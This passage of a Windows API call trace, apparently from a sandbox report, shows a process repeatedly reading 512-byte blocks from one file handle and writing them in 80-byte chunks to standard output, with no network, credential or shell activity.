lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] GetFileType (hFile=0x50) returned 0x1 [0162.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.982] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.983] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.983] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.983] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.984] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.984] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.984] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] GetFileType (hFile=0x50) returned 0x1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.985] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.985] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.985] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] GetFileType (hFile=0x50) returned 0x1 [0162.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.986] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.986] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.986] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.987] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] GetFileType (hFile=0x50) returned 0x1 [0162.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.987] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.987] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.987] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.988] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] GetFileType (hFile=0x50) returned 0x1 [0162.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.988] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.989] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.989] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.989] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.990] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.990] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] GetFileType (hFile=0x50) returned 0x1 [0162.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.990] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] 